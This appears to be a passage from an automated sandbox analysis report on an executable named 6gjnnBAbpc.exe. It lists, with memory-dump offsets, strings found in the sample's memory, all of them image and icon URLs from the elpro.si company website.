                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ELPRO-www-00-HOME-BZ-Logo_120x50-Wohler.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/Elpro_E-64x64.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/Elpro_E.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Analiza-plinov.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Kalibracija.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Nivo.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Regulacija.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Temperatura.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Tlak.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Vlaga.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/man-232.30_232.30_industrijski_manometer_industrijsk
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ELPRO-www-00-HOME-Header-01.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ELPRO-www-00-HOME-Header-01.jpg)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Eksplozivna-okolja.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 